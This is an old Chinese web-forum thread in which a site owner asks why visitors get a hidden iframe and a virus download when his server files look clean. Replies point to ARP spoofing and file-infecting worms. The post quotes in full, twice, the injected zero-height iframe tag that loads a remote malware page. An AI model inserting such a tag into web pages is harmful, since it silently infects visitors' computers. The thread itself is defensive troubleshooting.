6,871
社区成员
发帖
与我相关
我的任务
分享网站被挂马,但网页没有马的代码.请求高手帮助
我的站被挂了马,开一些页面会出现被挂马典型现象.挂马页面第一行被加了"<iframe src=http://md55.net/soft7/wwq.htm width=20 height=0 frameborder=0></iframe>",然后会下载并运行hack.suspiciousani这个病毒..
我从服务器上直接查看源文件的代码(htm格式),包括引用的js,css文件,都没有发现有被插入可疑代码.
我直接在服务器上开ie浏览,居然正常,在其他电脑上会出现的挂马页面,在服务器的ie中没有问题.
1.我检查了问题站的网页代码,正常
2.我检查了iis的配置,其中包括ISAPI筛选器,HTTP头,应用程序隐射,这3项都正常.
3.我检查了windows的用户账号,servu的账号。也正常。
这样的问题显然不是我的能力可以解决,请求大家帮助
我从服务器上直接查看源文件的代码(htm格式),包括引用的js,css文件,都没有发现有被插入可疑代码.
我直接在服务器上开ie浏览,居然正常,在其他电脑上会出现的挂马页面,在服务器的ie中没有问题.
1.我检查了问题站的网页代码,正常
2.我检查了iis的配置,其中包括ISAPI筛选器,HTTP头,应用程序隐射,这3项都正常.
3.我检查了windows的用户账号,servu的账号。也正常。
这样的问题显然不是我的能力可以解决,请求大家帮助
...全文
请发表友善的回复…
发表回复
madson 2007-09-12
- 打赏
- 举报
或许在某个文件里面有这句代码,只要有相关联的,都可以显示出来。
你可以通过木马程序把这段代码全部清楚掉,这样应该可以解决了!
你可以通过木马程序把这段代码全部清楚掉,这样应该可以解决了!
boysgo 2007-09-11
- 打赏
- 举报
回复5楼
我测试过,我认识的人中,包括外地的,访问页面都会中招.
而电信说他们机房没有ARP攻击的迹象.说除了我的服务器,其他的都正常.他们通过机房的什么什么方法查到的.说我的MAC地址应该是被窜改了.但他们也不知道怎么解决.
目前请了个技术员在修了,不知道会有什么结果.
看了篇文摘,通过arp欺骗来直接挂马,但文中没有详细提供解决方法.哎..
我测试过,我认识的人中,包括外地的,访问页面都会中招.
而电信说他们机房没有ARP攻击的迹象.说除了我的服务器,其他的都正常.他们通过机房的什么什么方法查到的.说我的MAC地址应该是被窜改了.但他们也不知道怎么解决.
目前请了个技术员在修了,不知道会有什么结果.
看了篇文摘,通过arp欺骗来直接挂马,但文中没有详细提供解决方法.哎..
kclmx 2007-09-11
- 打赏
- 举报
是不是别的机器的IE缓存没清理??
boysgo 2007-09-11
- 打赏
- 举报
回复3楼,在源文件中没有任何可疑的代码,这也是我束手无策的地方
kclmx 2007-09-11
- 打赏
- 举报
会不会是所有页面都加了<iframe src=http://md55.net/soft7/wwq.htm width=20 height=0 frameborder=0 > </iframe >这句,我遇到过这样的情况:环境:win2003 SP1 IIS6 中了Viking病毒,病毒往所有asp、html等文件中加入类似<iframe src=.... /iframe>的语句,后来删除病毒后,用ultra edit批量清除<ifram...语句才搞定的。
giiky 2007-09-10
- 打赏
- 举报
你本地局域网中了ARP,或者服务器的IP段,有一台服务器中了ARP,冒充网关。
请查一下,请容易的。
请查一下,请容易的。
boysgo 2007-09-10
- 打赏
- 举报
请问楼上的,我要如何检查呢?你说的情况是不是指机房的其他服务器中了ARP?
我是从我的服务器上检查,还是要求机房的人检查呢?
我是从我的服务器上检查,还是要求机房的人检查呢?
